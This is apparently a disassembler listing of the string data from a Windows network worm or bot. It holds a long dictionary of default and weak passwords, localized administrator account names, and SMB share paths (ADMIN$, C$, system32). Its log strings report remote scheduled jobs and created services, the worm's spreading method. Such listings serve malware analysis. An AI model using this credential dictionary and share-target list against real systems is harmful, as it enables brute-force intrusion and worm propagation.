off_43D2C0 dd offset word_63787A ; DATA XREF: .text:0043D2AC�o
dword_43D2C4 dd 70617Ah aYxcv db 'yxcv',0 ; DATA XREF: .text:0043D2A4�o
align 10h
aYouwontguessme db 'youwontguessme',0 ; DATA XREF: .text:0043D2A0�o
align 10h
aXyzzy db 'xyzzy',0 ; DATA XREF: .text:0043D29C�o
align 4
aXyz db 'xyz',0 ; DATA XREF: .text:0043D298�o
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: .text:0043D294�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: .text:0043D290�o
align 4
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: .text:0043D28C�o
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:0043D284�o
align 4
aXx db 'xx',0 ; DATA XREF: .text:0043D278�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: sub_40A938+8D06�o
; sub_40A938+8E80�o ...
align 4
aWin2k db 'win2k',0 ; DATA XREF: .text:0043D260�o
align 4
aWin db 'win',0 ; DATA XREF: .text:0043D258�o
aWired db 'wired',0 ; DATA XREF: .text:0043D254�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .text:0043D250�o
; .text:0043D25C�o
align 4
aWinston db 'winston',0 ; DATA XREF: .text:0043D24C�o
aWinpass db 'winpass',0 ; DATA XREF: .text:0043D248�o
aWinnt db 'winnt',0 ; DATA XREF: .text:0043D244�o
align 10h
aWing db 'wing',0 ; DATA XREF: .text:0043D240�o
align 4
aWine db 'wine',0 ; DATA XREF: .text:0043D23C�o
align 10h
aWindozexp db 'windozexp',0 ; DATA XREF: .text:0043D238�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: .text:0043D234�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: .text:0043D230�o
align 4
aWindoze95 db 'windoze95',0 ; DATA XREF: .text:0043D22C�o
align 10h
aWindoze2k db 'windoze2k',0 ; DATA XREF: .text:0043D228�o
align 4
aWindoze db 'windoze',0 ; DATA XREF: .text:0043D224�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: .text:0043D220�o
align 10h
aWindowsme db 'windowsME',0 ; DATA XREF: .text:0043D21C�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: .text:0043D218�o
align 4
aWindows95 db 'windows95',0 ; DATA XREF: .text:0043D214�o
align 4
aWindows2k db 'windows2k',0 ; DATA XREF: .text:0043D210�o
align 10h
aWindows db 'windows',0 ; DATA XREF: .text:0043D20C�o
; .text:0043D264�o
aWindose db 'windose',0 ; DATA XREF: .text:0043D208�o
aWin2kpro db 'Win2KPro',0 ; DATA XREF: .text:0043D204�o
align 4
off_43D3FC dd offset word_636E66 ; DATA XREF: .text:0043D200�o
dword_43D400 dd 737076h aVirus db 'virus',0 ; DATA XREF: .text:0043D1F8�o
align 4
off_43D40C dd offset loc_415353+2 ; DATA XREF: .text:0043D1F0�o
aSqlpass db 'sqlpass',0 ; DATA XREF: .text:0043D1EC�o
aSql db 'sql',0 ; DATA XREF: .text:0043D1E8�o
aServeur_0 db 'Serveur',0 ; DATA XREF: .text:0043D1E0�o
aStudents db 'students',0 ; DATA XREF: .text:0043D1D8�o
align 10h
aSlave db 'slave',0 ; DATA XREF: .text:0043D1D4�o
align 4
aSecrets db 'secrets',0 ; DATA XREF: .text:0043D1D0�o
aSecret db 'secret',0 ; DATA XREF: .text:0043D1CC�o
align 4
aSysadmin db 'sysadmin',0 ; DATA XREF: .text:0043D1C8�o
align 4
aSupport db 'support',0 ; DATA XREF: .text:0043D1C4�o
aSecurity db 'security',0 ; DATA XREF: sub_40A938+BB2�o
; sub_41EB23+1F�o ...
align 4
aSchool db 'school',0 ; DATA XREF: .text:0043D1BC�o
align 10h
aSa db 'sa',0 ; DATA XREF: .text:0043D1B8�o
align 4
aUserpass db 'userpass',0 ; DATA XREF: .text:0043D1B4�o
align 10h
aUsername db 'username',0 ; DATA XREF: .text:0043D1B0�o
align 4
aUsermane db 'usermane',0 ; DATA XREF: .text:0043D1AC�o
align 4
aUser1 db 'user1',0 ; DATA XREF: .text:0043D1A8�o
align 10h
aTrojan db 'trojan',0 ; DATA XREF: .text:0043D1A4�o
align 4
aTesting db 'testing',0 ; DATA XREF: .text:0043D1A0�o
aTester db 'tester',0 ; DATA XREF: .text:0043D19C�o
align 4
aTest123 db 'test123',0 ; DATA XREF: .text:0043D198�o
aTest db 'Test',0 ; DATA XREF: .text:0043D194�o
align 4
aRooted db 'rooted',0 ; DATA XREF: .text:0043D190�o
align 10h
aRemote db 'remote',0 ; DATA XREF: .text:0043D188�o
align 4
aR00t db 'r00t',0 ; DATA XREF: .text:0043D184�o
align 10h
aBlink182 db 'blink182',0 ; DATA XREF: .text:0043D17C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:0043D178�o
; .text:0043EE28�o
align 4
aQwert db 'qwert',0 ; DATA XREF: .text:0043D174�o
align 4
aQwer db 'qwer',0 ; DATA XREF: .text:0043D170�o
align 4
off_43D504 dd offset byte_657771 ; DATA XREF: .text:0043D16C�o
off_43D508 dd offset dword_647770 ; DATA XREF: .text:0043D160�o
aPw123 db 'pw123',0 ; DATA XREF: .text:0043D15C�o
align 4
aPw db 'pw',0 ; DATA XREF: .text:0043D158�o
align 4
aPassword123 db 'password123',0 ; DATA XREF: .text:0043D154�o
aPassword1 db 'password1',0 ; DATA XREF: .text:0043D150�o
align 10h
aPassword_1 db 'Password',0 ; DATA XREF: .text:0043D14C�o
align 4
aPassword_0 db 'PASSWORD',0 ; DATA XREF: .text:0043D148�o
align 4
aPassword db 'password',0 ; DATA XREF: .text:0043D144�o
; .text:0043EE04�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0043D140�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0043D13C�o
align 4
aPass123 db 'pass123',0 ; DATA XREF: .text:0043D138�o
aPass_1 db 'pass',0 ; DATA XREF: .text:0043D134�o
; .text:0043EE20�o
align 4
aOwned db 'owned',0 ; DATA XREF: .text:0043D12C�o
align 10h
aOwn db 'own',0 ; DATA XREF: .text:0043D128�o
aNull_1 db 'NULL',0 ; DATA XREF: .text:0043D124�o
align 4
aMyvps db 'myvps',0 ; DATA XREF: .text:0043D11C�o
align 4
aMssql db 'mssql',0 ; DATA XREF: .text:0043D118�o
align 4
aMysql db 'mysql',0 ; DATA XREF: .text:0043D114�o
align 4
aM_3 db 'M$',0 ; DATA XREF: sub_4053EE+138�o
; .text:0043D110�o
align 4
aMypc123 db 'mypc123',0 ; DATA XREF: .text:0043D10C�o
aMypc db 'mypc',0 ; DATA XREF: .text:0043D108�o
; .text:0043D120�o
align 4
aMypass123 db 'mypass123',0 ; DATA XREF: .text:0043D104�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:0043D100�o
align 4
aMs db 'MS',0 ; DATA XREF: .text:0043D0FC�o
align 10h
aMachine db 'machine',0 ; DATA XREF: .text:0043D0F8�o
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:0043D0F4�o
align 4
aMyvnc db 'myvnc',0 ; DATA XREF: .text:0043D0EC�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .text:0043D0E8�o
align 4
aLocal db 'LOCAL',0 ; DATA XREF: .text:0043D0E4�o
align 10h
aLogin db 'login',0 ; DATA XREF: .text:0043D0E0�o
align 4
aUnix db 'Unix',0 ; DATA XREF: .text:0043D0DC�o
align 10h
aL33t db 'l33t',0 ; DATA XREF: .text:0043D0D4�o
align 4
aL337 db 'l337',0 ; DATA XREF: .text:0043D0D0�o
align 10h
aLetmein db 'letmein',0 ; DATA XREF: .text:0043D0CC�o
; .text:0043EDF4�o
aHax db 'hax',0 ; DATA XREF: .text:0043D0C8�o
aHacked db 'hacked',0 ; DATA XREF: .text:0043D0C4�o
align 4
aGuessme db 'guessme',0 ; DATA XREF: .text:0043D0BC�o
aGuess db 'guess',0 ; DATA XREF: .text:0043D0B8�o
align 4
aFuckyou db 'fuckyou',0 ; DATA XREF: .text:0043D0B4�o
aFucked db 'fucked',0 ; DATA XREF: .text:0043D0B0�o
align 4
aEducation db 'education',0 ; DATA XREF: .text:0043D0AC�o
align 10h
off_43D660 dd offset byte_554445 ; DATA XREF: .text:0043D0A8�o
dword_43D664 dd 2Ah ; sub_40A938+121A�o ...
aDomainpassword db 'domainpassword',0 ; DATA XREF: .text:0043D09C�o
align 4
aSmbpass db 'smbpass',0 ; DATA XREF: .text:0043D098�o
off_43D680 dd offset byte_626D73 ; DATA XREF: .text:0043D094�o
aDbpass db 'dbpass',0 ; DATA XREF: .text:0043D088�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .text:0043D084�o
align 4
aDesktop db 'desktop',0 ; DATA XREF: .text:0043D080�o
aDead db 'dead',0 ; DATA XREF: .text:0043D07C�o
align 4
aDave db 'dave',0 ; DATA XREF: .text:0043D078�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .text:0043D074�o
align 10h
aDatabase db 'database',0 ; DATA XREF: .text:0043D070�o
align 4
aDaemon_0 db 'daemon',0 ; DATA XREF: .text:0043D06C�o
align 4
aDefaultpass db 'defaultpass',0 ; DATA XREF: .text:0043D068�o
aClosed db 'closed',0 ; DATA XREF: .text:0043D064�o
align 4
aClosed_0 db 'closed!',0 ; DATA XREF: .text:0043D060�o
aCustomer db 'customer',0 ; DATA XREF: .text:0043D044�o
align 4
aChangeme_0 db 'changeme!',0 ; DATA XREF: .text:0043D040�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:0043D03C�o
align 4
aChangethis db 'changethis',0 ; DATA XREF: .text:0043D038�o
align 10h
aChange db 'change',0 ; DATA XREF: .text:0043D034�o
align 4
aApache db 'apache',0 ; DATA XREF: .text:0043D028�o
align 10h
aAnything db 'anything',0 ; DATA XREF: .text:0043D024�o
align 4
aAccount? db 'account?',0 ; DATA XREF: .text:0043D01C�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:0043D014�o
; .text:0043EE34�o
align 10h
off_43D750 dd offset byte_636261 ; DATA XREF: .text:0043D010�o
aAbcd db 'abcd',0 ; DATA XREF: .text:0043D00C�o
; .text:0043D018�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: .text:0043D008�o
align 4
aAaaa db 'AAAA',0 ; DATA XREF: .text:0043D004�o
align 4
aAussie db 'aussie',0 ; DATA XREF: .text:0043CFF8�o
align 4
a88888888 db '88888888',0 ; DATA XREF: .text:0043CFD8�o
align 10h
a654321 db '654321',0 ; DATA XREF: .text:0043CFD4�o
; .text:0043EE30�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:0043CFD0�o
align 10h
a123qwe db '123qwe',0 ; DATA XREF: .text:0043CFCC�o
align 4
a123asd db '123asd',0 ; DATA XREF: .text:0043CFC8�o
align 10h
a123abc db '123abc',0 ; DATA XREF: .text:0043CFC4�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:0043CFC0�o
align 4
a123467890 db '123467890',0 ; DATA XREF: .text:0043CFBC�o
align 10h
a12346789 db '12346789',0 ; DATA XREF: .text:0043CFB8�o
align 4
a1234678 db '1234678',0 ; DATA XREF: .text:0043CFB4�o
a123467 db '123467',0 ; DATA XREF: .text:0043CFB0�o
align 4
a12346 db '12346',0 ; DATA XREF: .text:0043CFAC�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:0043CFA8�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .text:0043CFA4�o
; .text:0043EE2C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0043CFA0�o
; .text:0043EE00�o
a123456 db '123456',0 ; DATA XREF: .text:0043CF9C�o
; .text:0043EE0C�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0043CF98�o
; .text:0043EE08�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:0043CF94�o
; .text:0043EDF0�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:0043CF90�o
align 4
a123 db '123',0 ; DATA XREF: .text:0043CF8C�o
; .text:0043EDEC�o
a121212 db '121212',0 ; DATA XREF: .text:0043CF88�o
align 10h
a121 db '121',0 ; DATA XREF: .text:0043CF84�o
a12 db '12',0 ; DATA XREF: .text:0043CF80�o
align 4
a11111111 db '11111111',0 ; DATA XREF: .text:0043CF78�o
; .text:0043CF7C�o
align 4
a111111 db '111111',0 ; DATA XREF: .text:0043CF74�o
align 4
a111 db '111',0 ; DATA XREF: .text:0043CF6C�o
; .text:0043CF70�o
a110 db '110',0 ; DATA XREF: .text:0043CF68�o
a0wned db '0wned',0 ; DATA XREF: .text:0043CF60�o
align 4
a0wn3d db '0wn3d',0 ; DATA XREF: .text:0043CF5C�o
align 4
a007 db '007',0 ; DATA XREF: .text:0043CF58�o
a00000000 db '00000000',0 ; DATA XREF: .text:0043CF54�o
align 4
a000000 db '000000',0 ; DATA XREF: .text:0043CF50�o
align 4
a00000 db '00000',0 ; DATA XREF: .text:0043CF4C�o
align 4
a0000 db '0000',0 ; DATA XREF: .text:0043CF48�o
align 4
a000 db '000',0 ; DATA XREF: .text:0043CF44�o
a00 db '00',0 ; DATA XREF: .text:0043CF40�o
align 4
asc_43D894 db '%%%%%',0 ; DATA XREF: .text:0043CF38�o
align 4
asc_43D89C db '%%%%',0 ; DATA XREF: .text:0043CF34�o
align 4
asc_43D8A4 db '%%%',0 ; DATA XREF: .text:0043CF30�o
asc_43D8A8 db '%%',0 ; DATA XREF: .text:0043CF2C�o
align 4
asc_43D8AC: ; DATA XREF: .text:0043CF28�o
unicode 0, <%>,0
a@ db '!@#$%^&*',0 ; DATA XREF: .text:0043CF24�o
align 4
aXxx_0 db 'xXx',0 ; DATA XREF: .text:0043CF10�o
aXxxx db 'xxxx',0 ; DATA XREF: .text:0043CF0C�o
; .text:0043D280�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:0043CF08�o
; .text:0043D27C�o
aAspnet69 db 'aspnet69',0 ; DATA XREF: .text:0043CED0�o
align 4
aAspnet db 'aspnet',0 ; DATA XREF: .text:0043CECC�o
align 10h
aMailserver db 'mailserver',0 ; DATA XREF: .text:0043CEC8�o
align 4
aCompaqblah db 'Compaqblah',0 ; DATA XREF: .text:0043CEC0�o
align 4
aHallintovirk_0 db 'hallintovirkailijat',0 ; DATA XREF: .text:0043CE60�o
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:0043CE44�o
align 4
aAccess db 'Access',0 ; DATA XREF: .text:0043CE40�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:0043CE3C�o
align 10h
aAdmin_1 db 'admin',0 ; DATA XREF: .text:0043CE38�o
; .text:0043EDF8�o
align 4
asc_43D938: ; DATA XREF: .text:0041A0C2�o
; sub_424A42+1C5�o ...
unicode 0, < >,0
aY: ; DATA XREF: .text:0043CDF8�o
; .text:0043D270�o ...
unicode 0, <y>,0
asc_43D940: ; DATA XREF: .text:0043CDF4�o
; .text:0044F3B4�o ...
unicode 0, <X>,0
aWebserver db 'webserver',0 ; DATA XREF: .text:0043CDF0�o
align 10h
aWww db 'www',0 ; DATA XREF: .text:0043CDEC�o
; .text:0043D268�o
dword_43D954 dd 6C6C754Bh, 63FD6E61h, 0FDhaFormationplus db 'FormationPLUS',0 ; DATA XREF: .text:0043CDE4�o
align 10h
off_43D970 dd offset word_636E76 ; DATA XREF: .text:0043CDE0�o
; .text:0043D1F4�o ...
aBoss db 'BOSS',0 ; DATA XREF: .text:0043CDDC�o
; .text:0043CEAC�o ...
align 4
aPc05 db 'pc05',0 ; DATA XREF: .text:0043CDD8�o
; .text:0043CFF0�o
align 4
aPc04 db 'pc04',0 ; DATA XREF: .text:0043CDD4�o
; .text:0043CFEC�o
align 4
aPc03 db 'pc03',0 ; DATA XREF: .text:0043CDD0�o
; .text:0043CFE8�o
align 4
aPc02 db 'pc02',0 ; DATA XREF: .text:0043CDCC�o
; .text:0043CFE4�o
align 4
aPc01 db 'pc01',0 ; DATA XREF: .text:0043CDC8�o
; .text:0043CFE0�o
align 4
aProfessional db 'Professional',0 ; DATA XREF: .text:0043CDC4�o
align 4
aServUFtp db 'Serv-U FTP',0 ; DATA XREF: .text:0043CDC0�o
align 10h
aServU db 'serv-u',0 ; DATA XREF: .text:0043CDBC�o
align 4
aSlimftp db 'slimftp',0 ; DATA XREF: .text:0043CDB8�o
aLighthttpd db 'lightHTTPD',0 ; DATA XREF: .text:0043CDB4�o
align 4
aWarftpd db 'warftpd',0 ; DATA XREF: .text:0043CDB0�o
aFtpd db 'ftpd',0 ; DATA XREF: .text:0043CDAC�o
align 4
aProftpd db 'proftpd',0 ; DATA XREF: .text:0043CDA8�o
aAccounting db 'accounting',0 ; DATA XREF: .text:0043CDA4�o
; .text:0043D020�o
align 10h
aAccount db 'account',0 ; DATA XREF: .text:0043CDA0�o
aAccess_0 db 'access',0
align 10h
aServeurFtp db 'serveur ftp',0
aMichelle db 'michelle',0
align 4
aMyftp db 'myftp',0
align 10h
aMybox db 'mybox',0
align 4
aMsumer db 'msumer',0
align 10h
aCompaqsecret db 'Compaqsecret',0
align 10h
aDell db 'Dell',0 ; DATA XREF: .text:0043CEBC�o
align 4
off_43DA58 dd offset byte_4D4249 ; DATA XREF: .text:0043CEB8�o
aAcer db 'Acer',0
align 4
aM_4 db 'm$',0
align 4
dd offset loc_435048+1
dd offset loc_424D53
aMs_user db 'MS_USER',0 ; DATA XREF: .text:0043D0F0�o
aSmbuser db 'SMBUSER',0
aFv db 'fv',0
align 4
aBillgates db 'billgates',0 ; DATA XREF: .text:0043D030�o
align 10h
aUsers db 'users',0
align 4
aQaz db 'qaz',0 ; DATA XREF: .text:0043D168�o
a1: ; DATA XREF: .text:0043CF64�o
unicode 0, <1>,0
aQ: ; DATA XREF: .text:0043D164�o
; .text:off_44F300�o ...
unicode 0, <q>,0
aE_0: ; DATA XREF: .text:0043D0A0�o
; .text:0044F308�o ...
unicode 0, <e>,0
off_43DAA8 dd offset byte_616161 ; DATA XREF: .text:0043D000�o
dword_43DAAC dd 61h ; .text:0043CFFC�o ...
aLinux db 'linux',0 ; DATA XREF: .text:0043D0D8�o
align 4
aUnix_0 db 'unix',0
align 10h
a@_0 db '!@#$%^&',0 ; DATA XREF: .text:0043CF20�o
a@_1 db '!@#$%^',0 ; DATA XREF: .text:0043CF1C�o
align 10h
a@_2 db '!@#$%',0 ; DATA XREF: .text:0043CF18�o
align 4
a@_3 db '!@#$',0 ; DATA XREF: .text:0043CD24�o
; .text:0043CF14�o
align 10h
a@_4 db '!@#',0 ; DATA XREF: .text:0043CD20�o
a@_5 db '!@',0 ; DATA XREF: .text:0043CD1C�o
align 4
a31337 db '31337',0 ; DATA XREF: .text:0043CD18�o
; .text:0043CED4�o ...
align 10h
aGuest db 'guest',0 ; DATA XREF: .text:0043CD14�o
; .text:0043D0C0�o
align 4
aBox5 db 'box5',0 ; DATA XREF: .text:0043CD10�o
; .text:0043CF00�o
align 10h
aBox4 db 'box4',0 ; DATA XREF: .text:0043CD0C�o
; .text:0043CEFC�o
align 4
aBox3 db 'box3',0 ; DATA XREF: .text:0043CD08�o
; .text:0043CEF8�o
align 10h
aBox2 db 'box2',0 ; DATA XREF: .text:0043CD04�o
; .text:0043CEF4�o
align 4
aBox1 db 'box1',0 ; DATA XREF: .text:0043CD00�o
; .text:0043CEF0�o
align 10h
aBox db 'box',0 ; DATA XREF: .text:0043CCFC�o
; .text:0043CEEC�o
aSudo db 'sudo',0 ; DATA XREF: .text:0043CCF8�o
; .text:0043CEA4�o
align 4
aGameserver db 'gameserver',0 ; DATA XREF: .text:0043CCF4�o
align 4
aGameServer db 'game server',0 ; DATA XREF: .text:0043CCF0�o
off_43DB44 dd offset dword_4F2D48 ; DATA XREF: .text:0043CCEC�o
dword_43DB48 dd 5244h aExploited db 'exploited',0 ; DATA XREF: .text:0043CCE4�o
; .text:0043D090�o
align 4
aDivxServer db 'DiVX-SERVER',0 ; DATA XREF: .text:0043CCE0�o
; .text:0043CEB4�o
aDivx db 'DiVX',0 ; DATA XREF: .text:0043CCDC�o
; .text:0043CEB0�o
align 4
aBillGates db 'bill gates',0 ; DATA XREF: .text:0043CCD8�o
; .text:0043D02C�o
align 4
aClient05 db 'Client05',0 ; DATA XREF: .text:0043CCD4�o
; .text:0043D05C�o
align 4
aClient04 db 'Client04',0 ; DATA XREF: .text:0043CCD0�o
; .text:0043D058�o
align 10h
aClient03 db 'Client03',0 ; DATA XREF: .text:0043CCCC�o
; .text:0043D054�o
align 4
aClient02 db 'Client02',0 ; DATA XREF: .text:0043CCC8�o
; .text:0043D050�o
align 4
aClient01 db 'Client01',0 ; DATA XREF: .text:0043CCC4�o
; .text:0043D04C�o
align 4
aClient db 'Client',0 ; DATA XREF: .text:0043CCC0�o
; .text:0043D048�o
align 4
aBlah db 'blah',0 ; DATA XREF: .text:0043CCBC�o
align 4
a05 db '05',0 ; DATA XREF: .text:0043CCB8�o
; .text:0043CEE8�o
align 4
a04 db '04',0 ; DATA XREF: .text:0043CCB4�o
; .text:0043CEE4�o
align 4
a03 db '03',0 ; DATA XREF: .text:0043CCB0�o
; .text:0043CEE0�o
align 10h
a02 db '02',0 ; DATA XREF: .text:0043CCAC�o
; .text:0043CEDC�o
align 4
a01 db '01',0 ; DATA XREF: .text:0043CCA8�o
; .text:0043CED8�o
align 4
aAsp_net db 'ASP.NET',0 ; DATA XREF: .text:0043CCA4�o
aRdp db 'rdp',0 ; DATA XREF: .text:0043CCA0�o
; .text:0043D180�o
aLuna db 'luna',0 ; DATA XREF: .text:0043CC9C�o
align 4
aLiverpool db 'liverpool',0 ; DATA XREF: .text:0043CC98�o
; .text:0043CEA8�o
align 4
aCharlie db 'charlie',0 ; DATA XREF: .text:0043CC94�o
; .text:0043CE90�o ...
aMonkey db 'monkey',0 ; DATA XREF: .text:0043CC90�o
; .text:0043CE8C�o ...
align 4
aArsenal db 'arsenal',0 ; DATA XREF: .text:0043CC8C�o
; .text:0043CE88�o ...
aThomas db 'thomas',0 ; DATA XREF: .text:0043CC88�o
; .text:0043CE84�o ...
align 4
aMaster db 'master',0 ; DATA XREF: .text:0043CC84�o
; .text:0043CEC4�o ...
align 10h
aStandard db 'Standard',0 ; DATA XREF: .text:0043CC80�o
; .text:0043CE74�o
align 4
aHttpd db 'httpd',0 ; DATA XREF: .text:0043CC7C�o
align 4
aApacheServer db 'apache server',0 ; DATA XREF: .text:0043CC78�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:0043CC74�o
; .text:0043D18C�o
align 4
aOwner db 'owner',0 ; DATA XREF: .text:0043CC70�o
; .text:0043CE7C�o ...
align 4
aAdmin1 db 'Admin1',0 ; DATA XREF: .text:0043CC6C�o
; .text:0043CEA0�o
align 4
aAdmin_0 db 'ADMIN',0 ; DATA XREF: .text:0043CC68�o
; .text:0043CE9C�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0043CC64�o
; .text:0043CE98�o
align 4
aAdm db 'adm',0 ; DATA XREF: .text:0043CC60�o
; .text:0043CE94�o
aSystem_0 db 'SYSTEM',0 ; DATA XREF: sub_41E8A9+36�o
; .text:0043CC5C�o ...
align 4
aManager db 'manager',0 ; DATA XREF: .text:0043CC58�o
; .text:0043CE68�o
aServeur db 'serveur',0 ; DATA XREF: .text:0043CC54�o
aServidor db 'Servidor',0 ; DATA XREF: .text:0043CC50�o
; .text:0043D1DC�o
align 4
aUtilizador db 'Utilizador',0 ; DATA XREF: .text:0043CC4C�o
; .text:0043CE78�o
align 10h
aServer db 'Server',0 ; DATA XREF: .text:0043CC48�o
; .text:0043D1E4�o
align 4
aDefault_1 db 'default',0 ; DATA XREF: .text:0043CC44�o
; .text:0043D08C�o
aDefault_0 db 'Default',0 ; DATA XREF: .text:0043CC40�o
; .text:0043CE70�o
aXxxxxx db 'xxxxxx',0 ; DATA XREF: .text:0043CC3C�o
; .text:0043CDFC�o ...
align 10h
aContgenerale db 'Contgenerale',0 ; DATA XREF: .text:0043CC38�o
; .text:0043CE6C�o
align 10h
aAmministratore db 'Amministratore',0 ; DATA XREF: .text:0043CC34�o
; .text:0043CE64�o
align 10h
aHallintovirkai db 'Hallintovirkailijat',0 ; DATA XREF: .text:0043CC30�o
aVerwalter db 'Verwalter',0 ; DATA XREF: .text:0043CC2C�o
; .text:0043CE5C�o
align 10h
aRendszergazda db 'Rendszergazda',0 ; DATA XREF: .text:0043CC28�o
; .text:0043CE58�o
align 10h
aBeheerder db 'Beheerder',0 ; DATA XREF: .text:0043CC24�o
; .text:0043CE54�o
align 4
aAdministracion db 'Administracion',0 ; DATA XREF: .text:0043CC20�o
; .text:0043CE50�o
align 4
dword_43DD2C dd 696D6441h, 7473696Eh, 0F6746172h, 72h ; .text:0043CE4C�o
dword_43DD3C dd 0E8ECE4C0h, 0F2F1E8EDh, 0EEF2E0F0h, 0F0h ; .text:0043CE48�o
aAdministrators db 'Administrators',0 ; DATA XREF: .text:0043CC14�o
; .text:0043CE34�o
align 4
aAdministration db 'Administration',0 ; DATA XREF: .text:0043CC10�o
; .text:0043CE30�o
align 4
aAdministratori db 'Administratori',0 ; DATA XREF: .text:0043CC0C�o
; .text:0043CE2C�o
align 4
aAdministratore db 'Administratore',0 ; DATA XREF: .text:0043CC08�o
; .text:0043CE28�o
align 4
aAdministrado_0 db 'Administrador',27h,0 ; DATA XREF: .text:0043CC04�o
; .text:0043CE24�o
align 4
aAdministratoro db 'Administratoro',0 ; DATA XREF: .text:0043CC00�o
; .text:0043CE20�o
align 4
aAdministrada db 'Administrada',0 ; DATA XREF: .text:0043CBFC�o
; .text:0043CE1C�o
align 4
aAdministrateur db 'Administrateur',0 ; DATA XREF: .text:0043CBF8�o
; .text:0043CE18�o
align 4
aAdministrador db 'Administrador',0 ; DATA XREF: .text:0043CBF4�o
; .text:0043CE14�o
align 4
aAdmin db 'Admin',0 ; DATA XREF: .text:0043CBF0�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: .text:0043CBEC�o
; .text:0043CE10�o ...
align 4
aDDDDD db '%d%d%d%d%d',0 ; DATA XREF: sub_4051C0+87�o
align 10h
aSSS_4 db '%s\%s\%s',0 ; DATA XREF: sub_4051C0+3B�o
; sub_4053EE+2BD�o
align 4
aServicesactive db 'ServicesActive',0 ; DATA XREF: sub_4051C0+11�o
; sub_421DCA+18�o
align 4
aSSSSSSNetsched db '%s %s: -> [%s\%s, %s/%s] (NetSchedJobAdded)',0
; DATA XREF: sub_4053EE+4F7�o
aBlank db '(Blank)',0 ; DATA XREF: sub_4053EE+453�o
; sub_4053EE+49C�o
aSSSSSSCreateds db '%s %s: -> [%s\%s, %s/%s] (CreatedService)',0
; DATA XREF: sub_4053EE+422�o
align 4
aDevice0 db 'device0$',0 ; DATA XREF: sub_4053EE+244�o
align 4
aBrowser db 'BROWSER$',0 ; DATA XREF: sub_4053EE+23D�o
align 4
aDrivec db 'drivec$',0 ; DATA XREF: sub_4053EE+236�o
aMssql_0 db 'MSSQL$',0 ; DATA XREF: sub_4053EE+22F�o
align 4
aMysql_0 db 'MYSQL$',0 ; DATA XREF: sub_4053EE+228�o
align 4
aWinnt_0 db 'WINNT$',0 ; DATA XREF: sub_4053EE+221�o
align 4
aWindows_0 db 'WINDOWS$',0 ; DATA XREF: sub_4053EE+21A�o
align 10h
aPipe db 'PIPE$',0 ; DATA XREF: sub_4053EE+213�o
align 4
aPipe_0 db 'PIPE\',0 ; DATA XREF: sub_4053EE+20C�o
align 10h
aAdministrato_1 db 'ADMINISTRATOR$',0 ; DATA XREF: sub_4053EE+205�o
align 10h
aAdministrado_1 db 'ADMINISTRADOR$',0 ; DATA XREF: sub_4053EE+1FE�o
align 10h
aDDocume1Admi_0 db 'D$\DOCUME~1\ADMINI~1$',0 ; DATA XREF: sub_4053EE+1F7�o
align 4
aCDocume1Admi_0 db 'C$\DOCUME~1\ADMINI~1$',0 ; DATA XREF: sub_4053EE+1F0�o
align 10h
aDDocume1Admini db 'D$\DOCUME~1\ADMINI~1\',0 ; DATA XREF: sub_4053EE+1E9�o
align 4
aCDocume1Admini db 'C$\DOCUME~1\ADMINI~1\',0 ; DATA XREF: sub_4053EE+1E2�o
align 10h
aEWindowsSystem db 'E:\WINDOWS\system32$',0 ; DATA XREF: sub_4053EE+1DB�o
align 4
aEWinntSystem32 db 'E:\WINNT\system32$',0 ; DATA XREF: sub_4053EE+1D4�o
align 4
aDWindowsSystem db 'D:\WINDOWS\system32$',0 ; DATA XREF: sub_4053EE+1CD�o
align 4
aDWinntSystem32 db 'D:\WINNT\system32$',0 ; DATA XREF: sub_4053EE+1C6�o
align 4
aCWinntSystem32 db 'C:\WINNT\system32$',0 ; DATA XREF: sub_4053EE+1BC�o
align 4
aDWindows db 'D:\WINDOWS$',0 ; DATA XREF: sub_4053EE+1B5�o
aCWinnt db 'C:\WINNT$',0 ; DATA XREF: sub_4053EE+1AE�o
align 4
aZ_1 db 'Z$',0 ; DATA XREF: sub_4053EE+1A4�o
align 4
aY_0 db 'Y$',0 ; DATA XREF: sub_4053EE+19D�o
align 4
asc_43DFDC db 'X$',0 ; DATA XREF: sub_4053EE+196�o
align 10h
aW db 'W$',0 ; DATA XREF: sub_4053EE+18F�o
align 4
aV db 'V$',0 ; DATA XREF: sub_4053EE+188�o
align 4
aU_0 db 'U$',0 ; DATA XREF: sub_4053EE+17E�o
align 4
aT db 'T$',0 ; DATA XREF: sub_4053EE+174�o
align 10h
aR db 'R$',0 ; DATA XREF: sub_4053EE+16A�o
align 4
aQ_0 db 'Q$',0 ; DATA XREF: sub_4053EE+160�o
align 4
aP_3 db 'P$',0 ; DATA XREF: sub_4053EE+156�o
align 4
